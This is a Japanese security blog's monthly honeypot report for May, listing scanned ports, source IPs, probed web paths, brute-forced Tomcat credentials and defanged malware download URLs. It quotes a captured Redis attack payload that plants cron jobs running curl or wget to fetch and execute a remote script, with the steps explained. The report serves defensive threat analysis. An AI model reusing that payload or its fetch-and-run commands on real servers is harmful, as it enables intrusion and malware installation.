【ハニーポット月次分析】Honeypot 5月度月次分析〜WoWHoneypotの分析も載せてみました〜

そろそろ、WoWHoneypotもしっかりと分析していこうと思い、月次の分析に乗せてみました。HTTPの通信も見ていると様々な発見があり、次回以降も分析出来ればと思います。また、今回からちょっと、分析項目を増やしてみました。他にこんな情報が知りたいなどありましたら、twitterやコメントなどで残してもらえると助かります！
（どんな情報を提供したらいいか悩み中です）

今回の分析結果は以下となります。

【ハニーポット月次分析】
Honeypot 5月度月次分析〜WoWHoneypotの分析も載せてみました〜

【Honeytrap】
※80ポートへのアクセスはWoWHoneypotで収集

f:id:one-chick-sec:20190609180033p:plain

f:id:one-chick-sec:20190609180047p:plain

◾️宛先ポート別検知数
※件数差(前月)：4月との件数差、件数差(90日平均)：およそ3ヶ月の検知数の平均との差

ポート番号	サービス	件数	件数差(前月)	件数差(90日平均)
445	SMB	111334	8293	27414
23	TELNET	49176	-9063	1630
3389	RDP	36384	32206	32360
21	ftp	32364	31919	31979
5722	Unknown	25036	25034	25017
38884	Unknown	25000	24997	25014
4413	Unknown	24882	24877	24984
36663	Unknown	24847	24844	24883
47772	Unknown	24830	24828	24862
4399	Unknown	24786	24779	24829

RDPの通信が増加していますが、こちらは5/16に検知したものが大半となります。
また、よく分からないポートへの通信も増加していますが、特定のIPからのRDP brute force攻撃を検知したためとなっています。ポート自体は限定せず、あらゆるポートに対して実施しているため、増加しているものとなっています。詳細については過去のブログ記事を参照して下さい。

sec-chick.hatenablog.com

f:id:one-chick-sec:20190609180929p:plain

RDPにアクセスきた送信ものの内、大半を占めている送信元IPがあり、このIPが原因で検知数が増加したものとなります。

送信元IPアドレス	検知数	%
140[.]114[.]75[.]135	31,942	61.88%
181[.]143[.]77[.]131	1,403	2.72%
110[.]90[.]112[.]41	838	1.62%
18[.]185[.]116[.]98	713	1.38%
60[.]251[.]230[.]236	595	1.15%
193[.]56[.]28[.]219	489	0.95%
177[.]242[.]184[.]166	413	0.80%
139[.]162[.]108[.]129	368	0.71%
185[.]254[.]122[.]33	365	0.71%
193[.]106[.]29[.]66	346	0.67%

IPを調査してみると台湾・国立清華大学で利用されているIPと推測出来き、おそらく調査目的で利用したのではないかと推測されます。
何か文字列を送信している通信ではないため、ポートが空いているかどうかの調査行為だと思われます(だとしても、3万件近く通信を送ってくる理由は不明ですが。。。）

https://www.abuseipdb.com/check/140.114.75.135

◾️気になった通信
＜ポート番号＞
6379(Redis)

＜ペイロード＞
config set stop-writes-on-bgsave-error no
flushall
config set dbfilename root
set BabY1a "\t\n*/1 * * * * root curl -fsSL hxxps://pastebin[.]com/raw/J6NdVBHq|bash\n\t##"
set BabY2b "\t\n*/3 * * * * root wget -q -O- hxxps://pastebin[.]com/raw/J6NdVBHq|bash\n\t##"
config set dir /etc/cron.d
save
config set dir /var/spool/cron
save
config set dir /var/spool/cron/crontabs
save
flushall
config set stop-writes-on-bgsave-error yes

Redisコマンドによるマルウェアインストールを狙った通信であり、攻撃の流れは以下となります。

①ディスク異常でエラーが発生しても無視するように設定変更
②全てのDBの全てのKeyを削除
③DBをダンプするファイル rootを作成
④マルウェアをダウンロード後、cronに登録
⑤全てのDBの全てのKeyを削除
⑥ディスク異常でエラーが発生しても無視するように設定変更

今回、正規表現のミスでマルウェアの発見が遅くなってしまったため、どのようなマルウェアであるかまでは調査することが出来ませんでした。去年の9月にも同様の通信を検知しており、その時はCoin miner系のマルウェアでした。

sec-chick.hatenablog.com
次回こそはマルウェアの正体を調査できればと思います。

【WOWHoneypot】

f:id:one-chick-sec:20190609175542p:plain

f:id:one-chick-sec:20190609175556p:plain

◾️HTTP Path 別検知数(Top10)

HTTP Path	target	CVE	reference	count
/manager/html	Tomcat	-	-	911
/	-	-	-	793
/admin/assets/js/views/login.js	FreePBX	-	Source of login.js - framework - FreePBX GIT	310
hxxp://110.249.212.46/testget	Unauthorized Relay	-	-	99
/tmpfs/auto.jpg	IP camera	-	-	89
/robots.txt	-	-	-	25
/myblog/wp-login.php	WordPress	-	-	24
/wp/wp-login.php	WordPress	-	-	23
/blog/wp-login.php	WordPress	-	-	22
/forum1/wp-login.php	WordPress	-	-	21

Tomcatの管理コンソールへの不正アクセスやWordPressの調査行為が検知数の上位を占めていますが、IP電話で利用されるFreePBXへの通信も増加していました。

Asterisk (PBX) - Wikipedia

攻撃コードは含んでいないため、調査行為ですが何かの攻撃に繋げようとしているもかも知れません。レスポンスをうまく返せば、別の攻撃も検知できるのではないかと思います。
また、IPカメラ関連の通信も上位にランクインしていました。tmpfs/auto.jpg 宛への通信ですが、IPカメラでスナップショットを撮影出来ないか調査しているものと推測されます。

<ペイロード>
HEAD /tmpfs/auto.jpg?usr=admin&pwd=111111 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Connection: keep-alive
Accept: */*.User-Agent: python-requests/2.12.4

中華セキュリティカメラ事始め - Qiita

通信が成功したら、IPカメラに侵入できると攻撃者が判断し、攻撃フェーズへ移行するのではないかと思われます。

◾️Basic認証一覧
HTTP Path 別検知数で検知が多かったTomcatの管理マネージャへのアクセスですが、Basic認証で不正にアクセス出来ないか調査している通信が大半を占めています。
検知しているユーザ名とPWは以下となります。
＜ユーザ名＞

認証ユーザ名	検知数
admin	167
manager	125
user	124
both	123
tomcat	123
adminScript	122
administrator	122

＜認証PW(TOP10)＞

認証(PW)	検知数
admin	26
manager	26
tomcat	25
qwertyuiop	24
空白	23
123	23
123456	23
123456789	23
654321	23
dragon	23

検知ユーザはある程度固定されており、PWを変更した上でのBrute force攻撃でした。PWを見ているとよく使うパスワードが大半でした。少なくてもダメなパスワードと知られているものは設定しないようにしましょう。

＜参考情報＞
◾️IoC(Honeytrap)

マルウェアダウンロード先

hxxp://91[.]209[.]70[.]174/Corona[.]mips

hxxp://185[.]52[.]2[.]192/Demon[.]mips

hxxp://w[.]3ei[.]xyz:43768/lll[.]sh

hxxp://174[.]128[.]226[.]101/kr

hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips

hxxp://178[.]62[.]225[.]184/kr

206[.]189[.]187[.]186

hxxp://80[.]211[.]111[.]10/avtech

157[.]230[.]142[.]81

159[.]65[.]240[.]150

209[.]97[.]136[.]57

89[.]46[.]223[.]195

hxxps://pastebin[.]com/raw/J6NdVBHq

hxxp://hulo[.]r00ts[.]online/[.]configs/Ex01

157[.]230[.]251[.]197

199[.]38[.]245[.]220

hxxp://188[.]241[.]73[.]138/Reppin[.]mips

hxxp://185[.]70[.]105[.]35/teqbins[.]sh

hxxp://34[.]80[.]131[.]135/bins/shiina[.]mpsl

hxxps://an7kmd2wp4xo7hpr[.]onion[.]pet/src/ldm

134[.]209[.]241[.]98

46[.]101[.]210[.]172

hxxp://185[.]239[.]226[.]167:8480/huaweiceshi&&

hxxp://185[.]172[.]110[.]226/mips

hxxp://fid[.]hognoob[.]se/download[.]exe

hxxp://192[.]236[.]162[.]21/sh

ftp://103[.]93[.]76[.]104/160[.]16[.]145[.]183[.]conf

ftp://104[.]202[.]173[.]207/160[.]16[.]145[.]183[.]conf

hxxp://188[.]209[.]52[.]142/c

hxxp://194[.]147[.]32[.]131/icy[.]sh

hxxp://198[.]98[.]54[.]147/d

hxxp://80[.]211[.]241[.]28/c

hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]x86

hxxp://31[.]13[.]195[.]251/ECHOBOT[.]sh

hxxp://209[.]141[.]40[.]213/avtech

hxxp://kalonboats[.]tk/hakai[.]arm

hxxp://185[.]244[.]25[.]241/bins/cock[.]mpsl

hxxp://hulo[.]r00ts[.]online/[.]config/Lrep

hxxp://hulo[.]r00ts[.]online/[.]configs/Lrep

hxxp://hulo[.]r00ts[.]online/FleX/Lrep

hxxp://185[.]101[.]105[.]129/bins/kalon[.]mips

hxxp://45[.]67[.]14[.]194/xo/sora[.]mips

hxxp://134[.]209[.]34[.]32/bins/apep[.]mips

hxxp://209[.]141[.]37[.]251//orbitclient[.]mips

hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh

hxxp://198[.]13[.]42[.]229:8667/6HqJB0SPQqbFbHJD/init[.]sh

hxxp://43[.]245[.]222[.]57:8667/6HqJB0SPQqbFbHJD/init[.]sh

1[.]1[.]1[.]1

134[.]209[.]224[.]7

134[.]209[.]35[.]158

176[.]223[.]135[.]216

176[.]223[.]142[.]43

185[.]244[.]25[.]173

205[.]185[.]113[.]25

207[.]180[.]246[.]138

46[.]36[.]38[.]5

67[.]205[.]155[.]69

94[.]177[.]247[.]231

hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]mips

hxxp://1[.]1[.]1[.]1/Corona[.]mips

hxxp://176[.]223[.]142[.]43/akbins/mips[.]akirag

hxxp://185[.]244[.]25[.]199/akbins/mips[.]akira[.]ak

◾️検知したHTTP Path(WoWHoneypot )

wow_path_research	target	CVE	reference	count
/manager/html	Tomcat	-	-	911
/	-	-	-	793
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	310
hxxp://110[.]249[.]212[.]46/testget	Unauthorized Relay	-	-	99
/tmpfs/auto.jpg	IP camera	-	-	89
/robots.txt	-	-	-	25
/myblog/wp-login.php	WordPress	-	-	24
/wp/wp-login.php	WordPress	-	-	23
/blog/wp-login.php	WordPress	-	-	22
/forum1/wp-login.php	WordPress	-	-	21
/siteblog/wp-login.php	WordPress	-	-	21
/wordpress1/wp-login.php	WordPress	-	-	21
/wordpress2/wp-login.php	WordPress	-	-	21
/wordpress4/wp-login.php	WordPress	-	-	21
/wordpress9/wp-login.php	WordPress	-	-	21
/wp-login.php	WordPress	-	-	21
/wp5/wp-login.php	WordPress	-	-	21
/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-	20
/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-	20
/pma/scripts/setup.php	phpMyAdmin	-	-	20
/site/wp-login.php	WordPress	-	-	20
/wordpress/wp-login.php	WordPress	-	-	20
/w00tw00t.at.blackhats.romanian.anti-sec:)	phpMyAdmin	-	-	19
/forum/wp-login.php	WordPress	-	-	18
/wordpress8/wp-login.php	WordPress	-	-	18
/wp-admin/	WordPress	-	-	18
/wp1/wp-login.php	WordPress	-	-	18
/wp8/wp-login.php	WordPress	-	-	18
/wordpress3/wp-login.php	WordPress	-	-	17
/wordpress6/wp-login.php	WordPress	-	-	17
/wordpress7/wp-login.php	WordPress	-	-	17
/wp2/wp-login.php	WordPress	-	-	17
/wp4/wp-login.php	WordPress	-	-	17
/wp7/wp-login.php	WordPress	-	-	17
/TP/public/index.php	ThinkPHP	-	-	16
/admin/config.php	Admin config	-	-	16
/test/wp-login.php	WordPress	-	-	16
/myadmin/scripts/setup.php	phpMyAdmin	-	-	13
/wp3/wp-login.php	WordPress	-	-	13
/MyAdmin/scripts/setup.php	phpMyAdmin	-	-	12
/favicon.ico	-	-	-	11
/phpmy/scripts/setup.php	phpMyAdmin	-	-	10
www.baidu.com:443	Unauthorized Relay	-	-	9
/index.php	-	-	-	6
hxxp://check[.]proxyradar[.]com/azenv[.]php	Unauthorized Relay	-	-	6
///	-	-	-	5
///wp-json/wp/v2/users/	WordPress	-	-	5
/db/scripts/setup.php	phpMyAdmin	-	-	5
/pHpMyAdMiN/scripts/setup.php	phpMyAdmin	-	-	5
/phpmyadmin/index.php	phpMyAdmin	-	-	5
/1/wp-login.php	WordPress	-	-	4
/_async/AsyncResponseService	Oracle WebLogic Server	CVE-2019-2725	https://www.secure-sketch.com/blog/verify-oracle-weblogic-vulnerability	4
/mysql/scripts/setup.php	phpMyAdmin	-	-	4
/mysqladmin/scripts/setup.php	phpMyAdmin	-	-	4
/scripts/setup.php	phpMyAdmin	-	-	4
/sitemap.xml	xml sitemap	-	-	4
/sqladmin/scripts/setup.php	phpMyAdmin	-	-	4
hxxp://112[.]35[.]53[.]83:8088/index[.]php	Unauthorized Relay	-	-	4
hxxp://www[.]baidu[.]com/	Unauthorized Relay	-	-	4
/.git/config	git	-	-	3
/.well-known/security.txt	SSL certificate	-	https://qiita.com/comefigo/items/e9b1bce93c1b615e5934	3
/2017/wp-login.php	WordPress	-	-	3
/api/.env	.env file	-	-	3
/ipc$	IPC	-	https://thinline196.hatenablog.com/entry/2018/09/23/153019	3
/phpmyadmin	phpMyAdmin	-	-	3
/phpmyadmin/	phpMyAdmin	-	-	3
/tmpfs/snap.jpg	IP camera	-	https://www.ispyconnect.com/man.aspx?n=IPCMontor	3
cn.bing.com:443	Unauthorized Relay	-	-	3
hxxp://112[.]124[.]42[.]80:63435/	Unauthorized Relay	-	-	3
hxxp://www[.]123cha[.]com/	Unauthorized Relay	-	-	3
hxxp://www[.]ip[.]cn/	Unauthorized Relay	-	-	3
//vtigercrm/vtigerservice.php	vtiger vtiger CRM 5.2.1	-	https://www.securityfocus.com/bid/47267/info	2
/2019/wp-login.php	WordPress	-	-	2
/HNAP1	D-Link DIR-850L	CVE-2015-2051	https://www.morihi-soc.net/?p=981	2
/MySQL/scripts/setup.php	phpMyAdmin	-	-	2
/PHPMYADMIN/scripts/setup.php	phpMyAdmin	-	-	2
/_phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-	2
/acadmin.php	Webshell	-	-	2
/admin/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-	2
/admin/scripts/setup.php	phpMyAdmin	-	-	2
/autodiscover	Zimbra	-	https://www.exploit-db.com/exploits/46967	2
/configuracion/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-	2
/console/login/LoginForm.jsp	Oracle WebLogic Server	CVE-2015-4852	https://www.exploit-db.com/exploits/46628	2
/dbadmin/scripts/setup.php	PhpMyAdmin	-	-	2
/device.rsp	TBK Vision DVR	CVE-2018-9995	https://windabaft.co.jp/blog_ceo/?p=458	2
/epgrec/do-record.sh	epgrec	-	http://www.mda.or.jp/epgrec/index.php/epgrec%E3%81%AE%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB%E3%81%A8%E8%A8%AD%E5%AE%9A	2
/evox/about	Trane Tracer SC	-	https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327	2
/foltia/	foltia ANIME LOCKER	-	https://sec-owl.hatenablog.com/entry/2018/08/01/004310	2
/jmx-console/	Jboss	CVE-2010-0738	https://www.rapid7.com/db/modules/exploit/multi/http/jboss_maindeployer	2
/login.cgi	login Page	-	-	2
/mysite/wp-login.php	WordPress	-	-	2
/mysql/admin/index.php	PhpMyAdmin	-	-	2
/nx8j78af1b.jsp	Webshell	-	-	2
/php-my-admin/scripts/setup.php	phpMyAdmin	-	-	2
/php/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-	2
/php/scripts/setup.php	phpMyAdmin	-	-	2
/phpMyAdmin-2.11.1-all-languages/scripts/setup.php	phpMyAdmin	-	-	2
/phpMyAdmin-2.5.5/scripts/setup.php	phpMyAdmin	-	-	2
/phpMyAdmin-www072510/scripts/setup.php	phpMyAdmin	-	-	2
/phpMyAdmin/scripts/db___.init.php	phpMyAdmin	-	-	2
/phpMyAdmin2/scripts/setup.php	phpMyAdmin	-	-	2
/phpMyadmin	phpMyAdmin	-	-	2
/phpadmin/scripts/setup.php	phpMyAdmin	-	-	2
/phpmyadmin/scripts/db___.init.php	phpMyAdmin	-	-	2
/phpmyadmin/scripts/setup.php/index.php	phpMyAdmin	-	-	2
/pma2011/	phpMyAdmin	-	-	2
/pma2012/	phpMyAdmin	-	-	2
/sdk	Vmware	-	https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse	2
/server-status	Apache Server	-	https://github.com/mazen160/server-status_PWN	2
/setup.php	PHP	-	-	2
/shop/wp-login.php	WordPress	-	-	2
/sqladm/scripts/setup.php	phpMyAdmin	-	-	2
/system.ini	Microsoft Windows 3.1 System	-	https://www.weblio.jp/content/system.ini	2
/teststite/wp-login.php	WordPress	-	-	2
/usr/share/phpmyadmin/libraries/select_lang.lib.php	phpMyAdmin	-	-	2
/vlog/wp-login.php	WordPress	-	-	2
/web/cgi-bin/hi3510/param.cgi	Zivif Web	CVE-2017-17106	https://sec-owl.hatenablog.com/entry/2018/09/24/011848	2
/web/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-	2
/webdav/	WebDAV	-	-	2
/websql/scripts/setup.php	phpMyAdmin	-	-	2
hxxp://123[.]125[.]114[.]144/	Unauthorized Relay	-	-	2
hxxp://172[.]247[.]32[.]25/ddd[.]html	Unauthorized Relay	-	-	2
hxxp://5[.]188[.]210[.]101/echo[.]php	Unauthorized Relay	-	-	2
*	-	-	-	1
/.env	.env file	-	-	1
/.git/HEAD	git	-	-	1
//a2billing/customer/templates/default/footer.tpl	FreePBX	-	https://cute-0tter.hatenablog.com/entry/2019/02/25/235730	1
//about.php	PHP	-	-	1
//admin/config.php	Admin config	-	-	1
//blog/	WordPress	-	-	1
//recordings/	FreePBX	-	https://cute-0tter.hatenablog.com/entry/2019/02/25/235730	1
/2/wp-login.php	WordPress	-	-	1
/2018/wp-login.php	WordPress	-	-	1
/3/wp-login.php	WordPress	-	-	1
/HNAP1/	D-Link DIR-850L	CVE-2015-2051	https://www.morihi-soc.net/?p=981	1
/Nmap/folder/check1558937902	Nmap	-	-	1
/Nmap/folder/check1558950064	Nmap	-	-	1
/NmapUpperCheck1558937902	Nmap	-	-	1
/NmapUpperCheck1558950064	Nmap	-	-	1
/PHPMYADMIN/scripts/setup.ph	phpMyAdmin	-	-	1
/PMA/scripts/setup.php	phpMyAdmin	-	-	1
/RPC2_Login	dahua camera	-	https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d	1
/System/configurationFile/	Hikvision IP camera	-	https://mogu2itachi.hatenablog.com/entry/2019/04/07/065650	1
/Temporary_Listen_Addresses/SMSSERVICE	Microsoft SharePoint	CVE-2019-0604	https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild	1
/Temporary_Listen_Addresses/WSMAN	Microsoft SharePoint	CVE-2019-0604	https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild	1
/\cgi-bin/get_status.cgi	/\cgi-bin/get_status.cgi	-	-	1
/\cgi-bin/login.cgi	CGI	-	-	1
/_search	Elasticsearch	CVE-2015-1427	https://www.morihi-soc.net/?p=442	1
/admin.php	WordPress	-	https://nskw-style.com/2014/diary/visualize-wp-admin-flow.html	1
/admin/	-	-	-	1
/admin/.env	.env file	-	-	1
/admincooptel/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-	1
/alt/sqladmin/scripts/setup.php	phpMyAdmin	-	-	1
/app/.env	.env file	-	-	1
/backup/	-	-	-	1
/backup/.env	.env file	-	-	1
/blog//	WordPress	-	-	1
/blog//wp-json/wp/v2/users	WordPress	-	-	1
/blog//wp-json/wp/v2/users/	WordPress	-	-	1
/blog/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/blog2/wp-login.php	WordPress	-	-	1
/blog3/wp-login.php	WordPress	-	-	1
/ccvv	Unknown	-	-	1
/cgi-bin/user/Config.cgi	AVTECH AVN801 DVR	CVE-2013-4981	https://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-006100.html	1
/cms/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/current_config/passwd	dahua camera	-	https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py	1
/currentsetting.htm	NETGEAR Genie	-	https://qiita.com/comefigo/items/e9b1bce93c1b615e5934	1
/db/	-	-	-	1
/dbadmin/	phpMyAdmin	-	-	1
/dev/.env	.env file	-	-	1
/dev/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/developer/.env	.env file	-	-	1
/device_description.xml	UPnP	-	https://medium.com/@djboris/digging-into-upnp-by-searching-a-sonos-api-5e10e080a232	1
/downloader/	-	-	-	1
/fdsrwe	Webshell	-	-	1
/forum//	WordPress	-	-	1
/forum//wp-json/wp/v2/users/	WordPress	-	-	1
/forum1//	WordPress	-	-	1
/forum1//wp-json/wp/v2/users/	WordPress	-	-	1
/home.asp	ASP	-	-	1
/images/logo.gif	-	-	-	1
/index.action	Apache Struts2	CVE-2017-5638	https://github.com/mazen160/struts-pwn	1
/index.do	Apache Struts2	CVE-2017-5638	https://www.morihi-soc.net/?p=654	1
/login.html	login Page	-	-	1
/m/.env	.env file	-	-	1
/mobile/.env	.env file	-	-	1
/myadmin/	phpMyAdmin	-	-	1
/myblog//	WordPress	-	-	1
/myblog//wp-json/wp/v2/users/	WordPress	-	-	1
/myforum/wp-login.php	WordPress	-	-	1
/news/wp-login.php	WordPress	-	-	1
/nmaplowercheck1558937902	Nmap	-	-	1
/nmaplowercheck1558950064	Nmap	-	-	1
/phpMyAdmin-2.8.0.4/scripts/setup.php	phpMyAdmin	-	-	1
/phpMyAdmin/	phpMyAdmin	-	-	1
/phpMyAdmin/setup.php	phpMyAdmin	-	-	1
/phpMyAdmin/setup.php/index.php	phpMyAdmin	-	-	1
/phpmy/scripts/setup.php\	phpMyAdmin	-	-	1
/phpmyadmin.box25/scripts/setup.php	phpMyAdmin	-	-	1
/phpmyadmin/setup.php	phpMyAdmin	-	-	1
/phpmyadmin/setup.php/index.php	phpMyAdmin	-	-	1
/pma/	phpMyAdmin	-	-	1
/portal/.env	.env file	-	-	1
/public/.env	.env file	-	-	1
/pyaniste/mysqladmin/scripts/setup.php	phpMyAdmin	-	-	1
/qnfxcjqr	Webshell	-	-	1
/queryUserList	Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC}	-	https://github.com/mcw0/PoC/blob/master/TVT-PoC.py	1
/qzone/	-	-	-	1
/redirect.php	PHP	-	-	1
/scripts/setup.php/index.php	phpMyAdmin	-	-	1
/shop/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/site//	WordPress	-	-	1
/site//wp-json/wp/v2/users/	WordPress	-	-	1
/site/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/siteblog//	WordPress	-	-	1
/siteblog//wp-json/wp/v2/users/	WordPress	-	-	1
/struts2-rest-showcase/orders.xhtml	Apache Struts2	CVE-2017-5638	https://blue-blue.hatenablog.com/entry/2017/03/12/212730	1
/test//	WordPress	-	-	1
/test//wp-json/wp/v2/users/	WordPress	-	-	1
/upload/bank-icons/bank-gh.jpg	Unknown	-	-	1
/upload/bank-icons/bank_16.png	Unknown	-	-	1
/web/.env	.env file	-	-	1
/web/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/website/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/winbox.png	MikroTik	-	https://sec-owl.hatenablog.com/entry/2018/10/12/160525	1
/wordpress//	WordPress	-	-	1
/wordpress//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/wordpress1//	WordPress	-	-	1
/wordpress1//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress2//	WordPress	-	-	1
/wordpress2//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress3//	WordPress	-	-	1
/wordpress3//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress4//	WordPress	-	-	1
/wordpress4//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress5//	WordPress	-	-	1
/wordpress5//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress5/wp-login.php	WordPress	-	-	1
/wordpress6//	WordPress	-	-	1
/wordpress6//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress7//	WordPress	-	-	1
/wordpress7//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress8//	WordPress	-	-	1
/wordpress8//wp-json/wp/v2/users/	WordPress	-	-	1
/wordpress9//	WordPress	-	-	1
/wordpress9//wp-json/wp/v2/users/	WordPress	-	-	1
/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/wp//	WordPress	-	-	1
/wp//wp-json/wp/v2/users/	WordPress	-	-	1
/wp/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/wp1//	WordPress	-	-	1
/wp1//wp-json/wp/v2/users/	WordPress	-	-	1
/wp2//	WordPress	-	-	1
/wp2//wp-json/wp/v2/users/	WordPress	-	-	1
/wp3//	WordPress	-	-	1
/wp3//wp-json/wp/v2/users/	WordPress	-	-	1
/wp4//	WordPress	-	-	1
/wp4//wp-json/wp/v2/users/	WordPress	-	-	1
/wp5//	WordPress	-	-	1
/wp5//wp-json/wp/v2/users/	WordPress	-	-	1
/wp7//	WordPress	-	-	1
/wp7//wp-json/wp/v2/users/	WordPress	-	-	1
/wp8//	WordPress	-	-	1
/wp8//wp-json/wp/v2/users/	WordPress	-	-	1
/wwww/wp-includes/wlwmanifest.xml	WordPress	-	-	1
/~riba/pma/scripts/setup.php	phpMyAdmin	-	-	1
hxxp://112[.]35[.]88[.]28:8088/index[.]php	Unauthorized Relay	-	-	1
hxxp://160[.]16[.]145[.]183/	Unauthorized Relay	-	-	1
hxxp://api[.]ipify[.]org/	Unauthorized Relay	-	-	1
xui.ptlogin2.qq.com:443	Unauthorized Relay	-	-	1

以上、5月度のHoneypot分析となります。

sec-chick Blog

サイバーセキュリティブログ

【ハニーポット月次分析】Honeypot 5月度月次分析〜WoWHoneypotの分析も載せてみました〜